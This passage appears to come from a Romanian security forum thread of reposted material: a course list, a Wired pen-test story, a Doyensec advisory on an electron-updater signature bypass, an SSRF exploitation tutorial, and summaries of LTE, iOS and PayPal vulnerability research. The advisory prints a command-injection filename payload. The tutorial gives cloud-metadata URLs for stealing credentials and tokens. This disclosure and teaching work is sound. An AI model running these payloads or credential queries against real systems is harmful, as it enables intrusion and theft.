! from Université Jean Moulin Lyon 3 SMEs and New Markets: Trade, the Chinese Powerhouse and Online Opportunities from Deakin University SMEs and Digital Engagement from Deakin University MAPs-Management des Alliances, des Partenariats et de la Coopétition from Université Montpellier 2 Маркетинг. Часть 2. Инструментарий маркетинга from St. Petersburg State Polytechnic University Data Analysis for Decision Making from University System of Maryland Applied Scrum for Project Management from University System of Maryland Leadership and Influence from University System of Maryland Управление человеческими ресурсами from St. Petersburg State Polytechnic University Driving Speed through Agile Planning from University System of Maryland Global Business Strategy from University System of Maryland Corporate Finance from University System of Maryland Agile Solutions for Greater Innovation from University System of Maryland Agile Leadership Principles from University System of Maryland The Importance of Project Management in the Global Construction Industry from Coventry University An Introduction to Financial Management in Construction from Coventry University Principles of Service Management from Hanken School of Economics Комплекс маркетинга: 5Р from Moscow State Institute of International Relations (MGIMO) An Introduction to the Assessment of People at Work from Coventry University Финансы компаний: взгляд инвестора и кредитора from Sberbank Corporate University Introducción a la Siembra Directa from Universidad Nacional de Córdoba Bridging the Gap between Strategy Design and Delivery from Brightline Initiative An Introduction to Organisational Behaviour: How to Understand Your People from Coventry University Understanding Financial Statements from Coventry University L’Aviculture, une filière d’avenir from Agrocampus Ouest Introducción a las finanzas: Principios de valoración from Universidad del Rosario Management Essentials from Honeywell Biobased Business Development from HZ University of Applied Sciences HEALTH & MEDICINE Antibiotic Stewardship from Stanford University Fighting HIV with Antiretroviral Therapy: Implementing the Treat-All Approach from Columbia University Pediatric HIV Nursing from Columbia University Managing Your Health: The Role of Physical Therapy and Exercise from University of Toronto Cancer Survivorship for Primary Care Practitioners from University of Melbourne Introduction a l’immunologie from École Polytechnique Fédérale de Lausanne Environmental Public Health from Ohio State University Fundamentals of Pharmacology from Ohio State University Drugs, drug use, drug policy and health from University of Geneva Biohacking Your Brain’s Health from Emory University Beyond Medical Histories: Gaining Insight from Patient Stories from Brown University Actúa ante el dolor crónico from Universitat Autònoma de Barcelona (Autonomous University of Barcelona) Microbiologia e immunologia from University of Naples Federico II Nutrition, Heart Disease and Diabetes from Wageningen University Nutrition and Cancer from Wageningen University Ortodoncia: tratamientos dentales sencillos para casos complejos from The Pontificia Universidad Javeriana Integrating Care: Depression, Anxiety and Physical Illness from King’s College London Medical Cannabis for Pain Control from Technion – Israel Institute of Technology Agir pour la santé des reins from Sorbonne Universités An Introduction to Radiation Oncology: From Diagnosis to Survivorship from Trinity College Dublin Introduction to: Physical Examination and History Taking from Karolinska Institutet Diabetic Eye Disease: Strengthening Services from London School of Hygiene & Tropical Medicine Organ Donation: The Essentials for Healthcare Professionals from St. George’s University Future-proofing the Health Workforce from Griffith University Assessment of the Newborn from Griffith University Bridging healthcare and society from Tomsk State University Grundlagen der Unfallchirurgie from Technische Universität München (Technical University of Munich) Health and healthcare in transition: dilemmas of governance from Tomsk State University Essentials of Good Pharmacy Practice: The Basics from Taipei Medical University El dolor lumbar: Mucho más que un dolor from Universidad Rey Juan Carlos Maladie de Parkinson from Université de Nantes Developing Clinical Empathy: Making a Difference in Patient Care from St George’s, University of London Principles of Health Law and Regulatory Issues from Doane University Health Informatics Technology in Population Healthcare Analytics from Doane University U.S. Healthcare Systems from Doane University Population Health: Disease Prevention and Management from Doane University Fundamentals of Advocacy in Health Policy from Doane University Applying Leadership and Strategy Fundamentals in Healthcare from Doane University Healthcare Administration Comprehensive Exam from Doane University Leading Organizational Change in Healthcare from Doane University Strategic Leadership in Healthcare from Doane University Understanding Different Diets: Mediterranean, Baltic sea, and Okinawa from EIT Food Essentials of Lifestyle Medicine and Population Health from Doane University Introduction to Lifestyle Medicine from Doane University Organizational Culture and Change in Healthcare from Doane University Health Law, Policy, and Advocacy from Doane University Healthcare Finance, Economics and Risk from Doane University Vulnerable Populations from Doane University Healthcare Organization and Delivery Models from Doane University Health Informatics and Technology in Decision Making from Doane University Could You Be the Next Florence Nightingale? from Coventry University An Introduction to Physical Health Assessment from Coventry University Food for Thought: The Relationship Between Food, Gut and Brain from EIT Food Certified Lifestyle Medicine Executive Comprehensive Exam from Doane University Sweet Dreams from Communauté Université Grenoble Alpes DATA SCIENCE Data Analysis in Social Science—Assessing Your Knowledge from Massachusetts Institute of Technology Capstone Exam in Statistics and Data Science from Massachusetts Institute of Technology Image Processing and Analysis for Life Scientists from École Polytechnique Fédérale de Lausanne Big Data Emerging Technologies from Yonsei University Foundations of mining non-structured medical data from EIT Digital Data Science for Environmental Modelling and Renewables from University of Glasgow Técnicas de Análisis de Datos y Big Data from Universidad Rey Juan Carlos Практики работы с данными средствами Power Query и Power Pivot from Saint Petersburg State University Information Visualization: Applied Perception from New York University (NYU) Information Visualization: Foundations from New York University (NYU) Information Visualization: Advanced Techniques from New York University (NYU) Information Visualization: Programming with D3.js from New York University (NYU) Introducción a la Minería de Datos from Pontificia Universidad Católica de Chile EDUCATION & TEACHING College Algebra from Johns Hopkins University Calculus from Modern States College Mathematics from Modern States Precalculus from Modern States Assessment for Learning from University of Illinois at Urbana-Champaign Learning, Knowledge, and Human Development from University of Illinois at Urbana-Champaign Financial Accounting from Modern States Information Systems from State University of New York Western Civilization I: Ancient Near East to 1648 from State University of New York Principles of Management from Modern States Scratch: Programming for Teachers from Delft University of Technology Scratch: Programming for Kids (8+) from Delft University of Technology Теория и практика создания онлайн-курсов from Moscow Institute of Physics and Technology Biology from Purdue University Physique : préparation à l’entrée dans l’enseignement supérieur from École Polytechnique Contenido de las matemáticas de primaria from Universidad de los Andes PlanU: escoge la mejor carrera y universidad para ti from Universidad de los Andes Creating Apps in the Classroom from Queensland University of Technology Teaching Phonics in Early Childhood from Queensland University of Technology Modelli di insegnamento nella ricerca educativa from University of Naples Federico II Teaching the Beauty and Joy of Computing Curriculum from Friday Institute American Government from Modern States Understanding and Teaching Evolution from University of Bath Good Practice in Autism Education from University of Bath How to Succeed in Your Welsh Bacc: the Individual Project Essentials from University of Bath Introductory Sociology from New York Institute of Technology Innovating Instruction: Learning Design in the STEM Classroom from Teachers College, Columbia University Enhancing Catholic School Identity from KU Leuven University University Governance and Academic Leadership from Vrije Universiteit Brussel Enseñar, aprender y evaluar en Escuelas Rurales from Universidad Austral La escuela y su comunidad: lecciones desde la ruralidad from Universidad Austral Gestión estratégica de Escuelas en Contextos Rurales from Universidad Austral Educación en Contextos Rurales: Perspectivas en América Latina from Universidad Austral Developing Your Educational Leadership and Management Vision from University of Newcastle Applying Strategic Leadership in Education from University of Newcastle Leading Transformative Change in Education from University of Newcastle Your Adventure Story: From Home to a US University from University of Denver English Literature from Modern States College Composition from Modern States Analyzing and Interpreting Literature from Modern States American Literature from Modern States Natural Sciences from Modern States Western Civilization II: 1648 to the Present from Modern States Spanish Language from Modern States French Language from Modern States Humanities from Modern States Human Growth and Development from Modern States Introduction to Educational Psychology from Modern States German Language from American University Éducation par la recherche : le pédagogue chercheur from Sorbonne Paris Cité University PERSONAL DEVELOPMENT 業務効率や生産性向上につながる時間管理 from University of California, Irvine Conducting an Informational Interview from University of Washington Attending a Networking Event from University of Washington Preparing to Network in English from University of Washington Communication Strategies for a Virtual Age from University of Toronto Communicating Effectively: How to Inspire and Convince from Delft University of Technology Effective Business Communication from Indian Institute of Management Bangalore Crafting Realities: Work, Happiness, and Meaning from Indian Institute of Management Bangalore Los videojuegos como medio de comunicación efectiva from The Pontificia Universidad Javeriana Психология карьеры from Saint Petersburg State University Креативная коммуникация: методы и инструменты from Saint Petersburg State University Career Credentials: Evidence Your Expertise in Problem Solving from Deakin University Career Credentials: Evidence Your Self-management Skills from Deakin University Career Credentials: Evidence Your Expertise in Digital Literacy from Deakin University Negociación 4.0 from Universidad Austral Emotional Intelligence at Work from Coventry University Sursa: https://www.classcentral.com/report/new-courses-october-2018/

Dupa parerea mea o sursa de informatii mult mai de incredere decat mass-media: https://9gag.com/gag/a6Ngxwq Cititi comentariile. Sunt pareri ale unor oameni simpli din multe tari.

Din mai multe domenii: http://index-of.es/

curl v2.wttr.in/Bucharest

How a Hacker's Mom Broke Into a Prison—and the Warden's Computer Security analyst John Strand had a contract to test a correctional facility’s defenses. He sent the best person for the job: his mother. PHOTOGRAPH: GETTY IMAGE John Strand breaks into things for a living. As a penetration tester, he gets hired by organizations to attack their defenses, helping reveal weaknesses before actual bad guys find them. Normally, Strand embarks on these missions himself, or deploys one of his experienced colleagues at Black Hills Information Security. But in July 2014, prepping for a pen test of a South Dakota correctional facility, he took a decidedly different tack. He sent his mom. In fairness, it was Rita Strand's idea. Then 58, she had signed on as chief financial officer of Black Hills the previous year after three decades in the food service industry. She was confident, given that professional experience, that she could pose as a state health inspector to gain access to the prison. All it would take was a fake badge and the right patter. "She approached me one day, and said 'You know, I want to break in somewhere," says Strand, who is sharing the experience this week at the RSA cybersecurity conference in San Francisco. "And it's my mom, so what am I supposed to say?" That's not as easy a call as it might sound. Penetration testers always say that you can get amazingly far with just a clipboard and some confidence, but a novice run at a state correctional facility is just plain daunting. And while pen testers are contractually permitted to break into a client's systems, if they're caught tensions can escalate quickly. Two pen testers who broke into an Iowa courthouse as part of their job recently spent 12 hours in jail after a run-in with local authorities. "I’m out in the middle of nowhere at a pie shop with no way to get to her." JOHN STRAND, BLACK HILLS INFORMATION SECURITY Rita Strand's mission would also be complicated by her lack of technical expertise. A professional pen tester would be able to assess an organization's digital security in real time and plant back doors tailored to what they found on the specific network. Rita had the health inspector guise down cold, but she was no hacker. COURTESY OF JOHN STRAND To help get her in the door, Black Hills made Rita a fake badge, a business card, and a "manager's" card with John's contact info on it. Assuming she got inside, she would then take photos of the facility's access points and physical security features. Rather than have her try to hack any computers herself, John equipped Rita with so-called Rubber Duckies, malicious USB sticks that she would plug into every device she could. The thumb drives would beacon back to her Black Hills colleagues and give them access to the prison's systems. Then they could work on the digital side of the pen test remotely, while Rita continued her rampage. "For most people, the first couple of times they do this they get really uncomfortable," Strand says. "But she was all ready to go. Prison cybersecurity is crucial for obvious reasons. If someone could break into the prison and take over computer systems, it becomes really easy to take someone out of the prison." The morning of the pen test, the Strands and some colleagues carpooled to a café near the prison. Over a preparatory caramel roll and slice of pecan pie, they set up a war room of laptops, mobile hot spots, and other gear. When everything was set, Rita drove off to the prison on her own. "She takes off, and I’m thinking in the back of my head that this is a really bad idea," Strand says. "She has no pen testing experience. No IT hacking experience. I had said, 'Mom, if this gets bad you need to pick up the phone and call me immediately.'" Pen testers usually try to get in and out of a facility as quickly as possible to avoid arousing suspicion. But after 45 minutes of waiting, there was no sign of Rita. "It gets to be about an hour, and I’m panicking," he says. "And I'm thinking I should have thought it through, because we all went in the same car so I’m out in the middle of nowhere at a pie shop with no way to get to her." Suddenly, the Black Hills laptops began blinking with activity. Rita had done it. The USB drives she had planted were creating so-called web shells, which gave the team at the café access to various computers and servers inside the prison. Strand remembers one colleague yelling out: "Your mom's OK!" In fact, Rita had encountered no resistance at all inside the prison. She told the guards at the entrance that she was conducting a surprise health inspection and they not only allowed her in, but let her keep her cell phone, with which she recorded the entire operation. In the facility's kitchen, she checked the temperatures in refrigerators and freezers, pretended to swab for bacteria on the floors and counters, looked for expired food, and took photos. But Rita also asked to see employee work areas and break areas, the prison's network operations center, and even the server room—all allegedly to check for insect infestations, humidity levels, and mold. No one said no. She was even allowed to roam the prison alone, giving her ample time to take photos and plant her Rubber Duckies. At the end of the "inspection," the prison director asked Rita to visit his office and suggest how the facility might improve its food service practices. She ran through some concerns, informed by decades being on the other side of health inspections. Then she handed him a specially prepared USB drive. The state had a helpful self-assessment checklist, she told the director, that he could use going forward to identify issues before an inspector showed up. The Microsoft Word document was tainted with a malicious macro. When the prison boss clicked, he inadvertently gave Black Hills access to his computer. "We were just dumbfounded," Strand says. "It was an overwhelming success. And there's a lot to take from it for the security community about fundamental weaknesses and the importance in institutional security of politely challenging authority. Even if someone says they're an elevator inspector or a health inspector or whatever, we need to do better about asking people questions. Don’t blindly assume." Other pen testers emphasize that while Rita's story is exceptional, it strongly reflects their daily experience. "The physical aspects of things and what you can claim is incredible. We do similar jobs all the time and rarely ever get caught," says David Kennedy, founder of the pen testing firm TrustedSec, who first heard an abridged version of Strand's story at the Derbycon security conference, which Kennedy ran. "If you claim to be inspectors, auditors, someone of authority, anything is possible." In 2016, Rita died of pancreatic cancer; she never had a chance to do another pen test. Strand declined to say which prison his mother infiltrated, only that it has since shut down. But her efforts made an impact. "The prison made security improvements as a result of the pen test," Strand says. "I also think their health program was improved by it as well." Sursa:Lhttps://www.wired.com/story/hackers-mom-broke-into-prison-wardens-computer/

Try these: https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

Sursa trusted, 9gag:

Dap, sunt multe trucuri care se pot face: https://2303380057

Signature Validation Bypass Leading to RCE In Electron-Updater 24 Feb 2020 - Posted by Lorenzo Stella We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw. Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers. This software is commonly used to build platform-specific packages for ElectronJs-based applications, and it is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting SHA1 & SHA256 hashing algorithms). A Fail Open Design As part of a security engagement for one of our customers, we have reviewed the update mechanism performed by Electron Builder, and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check hence leading to remote command execution. The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes. To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security: execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], { timeout: 20 * 1000 }, (error, stdout, stderr) => { try { if (error != null || stderr) { handleError(logger, error, stderr) resolve(null) return } const data = parseOut(stdout) if (data.Status === 0) { const name = parseDn(data.SignerCertificate.Subject).get("CN")! if (publisherNames.includes(name)) { resolve(null) return } } const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2) logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`) resolve(result) } catch (e) { logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`) resolve(null) return } }) which translates to the following PowerShell command: powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress" Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64). For instance, a malicious update definition would look like: version: 1.2.3 files: - url: v’ulnerable-app-setup-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA== size: 44653912 path: v'ulnerable-app-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA== releaseDate: '2019-11-20T11:17:02.627Z' When serving a similar latest.yml to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, she can leverage the lack of escaping to pull out a trivial command injection: version: 1.2.3 files: - url: v';calc;'ulnerable-app-setup-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA== size: 44653912 path: v';calc;'ulnerable-app-1.2.3.exe sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA== releaseDate: '2019-11-20T11:17:02.627Z' From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges. Impact An attacker could leverage this fail open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a service compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server. Disclosure Timelines Doyensec contacted the main project maintainer on November 12th, 2019 providing a full description of the vulnerability, together with a Proof-of-Concept. After multiple solicitations, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk. At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows, including: Wordpress for Desktop - Still vulnerable in v4.7.0 IOTA Trinity Wallet - Auto-updates feature has been disabled for Windows (#2566, #2588) Alva - Still vulnerable in v0.9.2 MyMonero - Still vulnerable in v1.1.13 Cozy Drive - Still vulnerable in v3.19.0 On February 15th, 2020, we’ve been made aware that the vulnerability discussed in this blog post was discussed on Twitter. On February 24th, 2020, we’ve been informed by the package’s mantainer that the issue was resolved in release v22.3.5. While the patch is mitigating the potential command injection risk, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we have decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates. Mitigations Despite its popularity, we would suggest moving away from Electron-Builder due to the lack of secure coding practices and responsiveness of the maintainer. Electron Forge represents a potential well-maintained substitute, which is taking advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since the Squirrel.Windows doesn’t implement signature validation either, for a robust signature validation on Windows consider shipping the app to the Windows Store or incorporate minisign into the update workflow. Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected. If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exists in Electron-Builder. Standard security hardening and monitoring on the update server is important, as full access on such system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario. Credits This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post. Sursa: https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html

Exploiting SSRFs And how I got your company secrets. Vickie Li Jun 3, 2019 · 7 min read Now that we got the basics of SSRFs down, let’s learn to exploit them! If you aren’t familiar with SSRFs or need a refresher, here’s the first part of the series about SSRF: Intro to SSRF And how your firewall failed you. medium.com So what exactly can a hacker do with an SSRF vulnerability? Well, that usually depends on the internal services found on the network. Today, we’ll talk about a few common ways to exploit the vulnerability once you’ve found one. Let’s dive right in! I found an SSRF! What now? SSRF vulnerabilities can be used to: Scan the network for hosts, Port scan internal machines and fingerprint internal services, collect instance metadata, bypass access controls, leak confidential data, and even execute code on reachable machines. Network Scanning First, SSRFs can be used to scan the network for other reachable machines. This is done by feeding the vulnerable endpoint with a range of internal IP addresses and see if the server responds differently for each address. Using the differences in server behavior, we can gather info about the network structure. For example, when you request: https://public.example.com/upload_profile_from_url.php?url=10.0.0.1 The server responds with: Error: cannot upload image: http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 And when you request: https://public.example.com/upload_profile_from_url.php?url=10.0.0.2 The server responds with: Error: cannot upload image: Connection Failed We can deduce that 10.0.0.1 is the address of a valid host on the network, while 10.0.0.2 is not. Port Scanning and Service Fingerprinting SSRF can also be used to port scan network machines and reveal services running on these machines. Open ports provide a pretty good indicator of services running on the machine, as services have default ports that they run on, and port scan results point you to ports to inspect manually. This will help you plan further attacks tailored to the services found. Provide the vulnerable endpoint with different ports of identified internal machines and determine if there is a difference in server behavior between ports. It’s the same process as scanning for hosts, except this time, you’re switching out port numbers. (Port numbers range from 0 to 65535.) For example, when you send a request to port 80 on an internal server (eg. 10.0.0.1:80), the server responds with: Error: cannot upload image: http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 And when you send a request to port 11 on the same server (eg. 10.0.0.1:11), the server responds with this: Error: cannot upload image: Connection Failed We can deduce that port 80 is open on the server, while port 11 is not. Pulling Instance Metadata Amazon Elastic Compute Cloud (Amazon EC2) is a service that allows businesses to run applications in the public cloud. It has a service called “Instance Metadata”. This enables EC2 instances to access an API that returns data about the instance itself (on the address 169.254.169.254). An instance metadata API service similar to that of EC2’s is also available on Google Cloud. These API endpoints are accessible by default unless they are specifically blocked or disabled by network admins. The information these services reveal is often extremely sensitive and could potentially allow attackers to escalate SSRFs to serious info leaks and RCE (Remote Code Execution). Querying AWS EC2 Metadata If a company is hosting its infrastructure on Amazon EC2, you can query various instance metadata about the host using the endpoints at http://169.254.169.254/latest/meta-data/ These endpoints reveal information such as API keys, AWS S3 tokens, and passwords. Here is the complete documentation from Amazon. Here are a few especially useful ones to go after first: http://169.254.169.254/latest/meta-data/ returns the list of available metadata that you can query. http://169.254.169.254/latest/meta-data/local-hostname/ returns the internal hostname used by the host. http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME returns the security credentials of that role. http://169.254.169.254/latest/dynamic/instance-identity/document reveals the private IP address of the current instance. http://169.254.169.254/latest/user-data/ returns user data on the current instance. Querying Google Cloud Metadata If the company uses Google Cloud, you could try to query Google Instance Metadata API instead. Google implements some additional security measures for their API endpoints — Querying Google Cloud Metadata APIv1 requires special headers: “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True” But this protection can be easily bypassed because most endpoints accessible through APIv1 can be accessed via the API v1beta1 endpoints instead. And API v1beta1 does not have the same header requirements. Here’s the full documentation of the API from Google. Here are a few critical pieces of information to go after first: http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token returns the access token of the default account on the instance. http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-key returns public SSH keys that can connect to other instances in this project. Amazon and Google aren’t the only web services that provide metadata APIs. However, these two have quite a large market share so chances are the company that you are testing is on one of these platforms. If not, here’s a list of other cloud metadata services and things you can try. Using What You’ve Got Now using what you’ve found by scanning the network, identifying services and pulling instance metadata, you can try to pull these off: Bypass access controls: Some internal services might only control access based on IP addresses or internal headers. It might be possible to bypass access controls to sensitive functionalities just by sending the request from a trusted machine. Leak confidential information: If you’re able to find credentials using the SSRF, you can then use those credentials to access confidential information stored on the network. For example, if you were able to find AWS S3 keys, go through the company’s private S3 buckets and see if you have access to those. Execute code: You can use the info you gathered to turn SSRF into RCE. For example, if you found admin credentials that give you write privileges, try uploading a shell. Or if you found an unsecured admin panel, are there any features that allow the execution of scripts? Better yet, maybe you can log in as root? Blind SSRFs Blind SSRFs are SSRFs where you don’t get a response or error message back from the target server. The exploitation of blind SSRFs is often limited to network mapping, port scanning, and service discovery. Since you can’t extract information directly from the target server, exploitation of blind SSRFs relies heavily on deduction. Utilizing HTTP status codes and server response times, we can achieve similar results as regular SSRF. Network and Port Scanning using HTTP status codes For example, when you feed the following request results in an HTTP status code of 200 (Status code for “OK”). https://public.example.com/webhook?url=10.0.0.1 While the following request results in an HTTP status code of 500 (Status code for “Internal Server Error”). https://public.example.com/webhook?url=10.0.0.2 We can deduce that 10.0.0.1 is the address of a valid host on the network, while 10.0.0.2 is not. Port scanning with blind SSRF works the same way. If the server returns a 200 status code for some ports and 500 for others, the ports that yield a 200 status code might be the open ports on the machine. Network and Port Scanning using Server response times If the server is not returning any useful information in the form of status codes, all is not lost. You might still be able to figure out the network structure by examining how long the server is taking to respond to your request. If the server is taking much longer to respond for some addresses, it might indicate that those network addresses are unrouted, or are hidden behind a firewall. On the other hand, unusually short response times may also indicate unrouted address, if the request is dropped by the router immediately. If the server is taking much longer to respond for some ports, it might indicate that those ports are closed. Check out this graph published by @jobert on the Hackerone Blog. It provides a good overview of how a network would behave. When performing any kind of network or port scanning, it is important to remember that vulnerable machines behave differently, and the key is to look for differences in behavior instead of the specific signatures described above. Leaking Info to External Servers The target machine might also leak sensitive information in outbound requests, such as internal IPs, headers, and version numbers of the software used. Try to provide the vulnerable endpoint with the address of a server you own and see what you can extract from the incoming request! Conclusion SSRF is a vulnerability that is full of potential. Here’s a link to the SSRF Bible. It discusses many more methods of exploiting SSRFs. In future posts, we will discuss real-life examples of how master hackers have utilized SSRF to own company networks! Happy Hacking! Next time, we’ll talk about how to bypass common SSRF protection mechanisms used by companies. Hi there, thanks for reading. Please help make this a better resource for new hackers: feel free to point out any mistakes or let me know if there is anything I should add! Disclaimer: Trying this on systems where you don’t have permission to test is illegal. If you’ve found a vulnerability, please disclose it responsibly to the vendor. Help make our Internet a safer place Thanks to Jennifer Li. Web Security AWS Penetration Testing Bug Bounty Hacking Written by Vickie Li Professional investigator of nerdy stuff. Hacks and secures. Creates god awful infographics. https://twitter.com/vickieli7 Sursa: https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437

Breaking LTE on Layer Two David Rupprecht, Katharina Kohls, Thorsten Holz, and Christina Pöpper Ruhr-Universität Bochum & New York University Abu Dhabi Introduction Security Analysis of Layer Two Our security analysis of the mobile communication standard LTE ( Long-Term Evolution, also know as 4G) on the data link layer (so called layer two) has uncovered three novel attack vectors that enable different attacks against the protocol. On the one hand, we introduce two passive attacks that demonstrate an identity mapping attack and a method to perform website fingerprinting. On the other hand, we present an active cryptographic attack called aLTEr attack that allows an attacker to redirect network connections by performing DNS spoofing due to a specification flaw in the LTE standard. In the following, we provide an overview of the website fingerprinting and aLTE attack, and explain how we conducted them in our lab setup. Our work will appear at the 2019 IEEE Symposium on Security & Privacy and all details are available in a pre-print version of the paper. Sursa: https://alter-attack.net/

time_waste iOS 13.0-13.3 tfp0 for all devices (in theory) using heap overflow bug by Brandon Azad (CVE-2020-3837) and cuck00 info leak by Siguza (will probably remove in the future). Exploitation is mostly the same as oob_timestamp with a few differences. The main difference is that this one does not rely on hardcoded addresses and thus should be more reliable. The rest of the code is under GPL (exception given to the unc0ver team) Sursa: https://github.com/jakeajames/time_waste

We found 6 critical PayPal vulnerabilities – and PayPal punished us for it by Bernard Meyer February 17, 2020 in Security 6 19 SHARES Share on FacebookShare on Twitter In the news, it seems that PayPal gives a lot of money to ethical hackers that find bugs in their tools and services. In March 2018, PayPal announced that they’re increasing their maximum bug bounty payment to $30,000 – a pretty nice sum for hackers. On the other hand, ever since PayPal moved its bug bounty program to HackerOne, its entire system for supporting bug bounty hunters who identify and report bugs has become more opaque, mired in illogical delays, vague responses, and suspicious behavior. When our analysts discovered six vulnerabilities in PayPal – ranging from dangerous exploits that can allow anyone to bypass their two-factor authentication (2FA), to being able to send malicious code through their SmartChat system – we were met with non-stop delays, unresponsive staff, and lack of appreciation. Below, we go over each vulnerability in detail and why we believe they’re so dangerous. When we pushed the HackerOne staff for clarification on these issues, they removed points from our Reputation scores, relegating our profiles to a suspicious, spammy level. This happened even when the issue was eventually patched, although we received no bounty, credit, or even a thanks. Instead, we got our Reputation scores (which start out at 100) negatively impacted, leaving us worse off than if we’d reported nothing at all. It’s unclear where the majority of the problem lies. Before going through HackerOne, we attempted to communicate directly with PayPal, but we received only copy-paste Customer Support responses and humdrum, say-nothing responses from human representatives. There also seems to be a larger issue of HackerOne’s triage system, in which they employ Security Analysts to check the submitted issues before passing them onto PayPal. The only problem – these Security Analysts are hackers themselves, and they have clear motivation for delaying an issue in order to collect the bounty themselves. Since there is a lot more money to be made from using or selling these exploits on the black market, we believe the PayPal/HackerOne system is flawed and will lead to fewer ethical hackers providing the necessary help in finding and patching PayPal’s tools. Vulnerabilities we discovered In our analysis of PayPal’s mobile apps and website UI, we were able to uncover a series of significant issues. We’ll explain these vulnerabilities from the most severe to least severe, as well as how each vulnerability can lead to serious issues for the end user. #1 Bypassing PayPal’s two-factor authentication (2FA) Using the current version of PayPal for Android (v. 7.16.1), the CyberNews research team was able to bypass PayPal’s phone or email verification, which for ease of terminology we can call two-factor authentication (2FA). Their 2FA, which is called “Authflow” on PayPal, is normally triggered when a user logs into their account from a new device, location or IP address. How we did it In order to bypass PayPal’s 2FA, our researcher used the PayPal mobile app and a MITM proxy, like Charles proxy. Then, through a series of steps, the researcher was able to get an elevated token to enter the account. (Since the vulnerability hasn’t been patched yet, we can’t go into detail of how it was done.) The process is very simple, and only takes seconds or minutes. This means that attackers can gain easy access to accounts, rendering PayPal’s lauded security system useless. What’s the worst case scenario here? Stolen PayPal credentials can go for just $1.50 on the black market. Essentially, it’s exactly because it’s so difficult to get into people’s PayPal accounts with stolen credentials that these stolen credentials are so cheap. PayPal’s authflow is set up to detect and block suspicious login attempts, usually related to a new device or IP, besides other suspicious actions. But with our 2FA bypass, that security measure is null and void. Hackers can buy stolen credentials in bulk, log in with those credentials, bypass 2FA in minutes, and have complete access to those accounts. With many known and unknown stolen credentials on the market, this is potentially a huge loss for many PayPal customers. PayPal’s response We’ll assume that HackerOne’s response is representative of PayPal’s response. For this issue, PayPal decided that, since the user’s account must already be compromised for this attack to work, “there does not appear to be any security implications as a direct result of this behavior.” Based on that, they closed the issue as Not Applicable, costing us 5 reputation points in the process. #2 Phone verification without OTP Our analysts discovered that it’s pretty easy to confirm a new phone without an OTP (One-Time Pin). PayPal recently introduced a new system where it checks whether a phone number is registered under the same name as the account holder. If not, it rejects the phone number. How we did it When a user registers a new phone number, an onboard call is made to api-m.paypal.com, which sends the status of the phone confirmation. We can easily change this call, and PayPal will then register the phone as confirmed. The call can be repeated on already registered accounts to verify the phone. What’s the worst case scenario here? 